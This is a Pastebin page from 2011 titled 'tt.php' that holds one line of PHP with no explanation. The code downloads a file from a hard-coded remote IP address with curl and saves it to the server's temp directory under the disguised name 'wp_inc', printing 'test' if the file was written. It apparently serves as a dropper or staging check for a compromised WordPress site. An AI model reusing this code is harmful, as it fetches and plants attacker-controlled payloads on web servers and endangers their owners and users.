Advertisement
Guest User

tt.php

a guest
Nov 4th, 2011
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://91.196.216.20/eu_deb'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $z = curl_exec($ch); curl_close($ch); $t = sys_get_temp_dir(); $f = fopen($t.'/wp_inc',"w"); fputs($f,$z); fclose($f); if (file_exists($t.'/wp_inc')) { echo ('test'); } exit();
  2.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement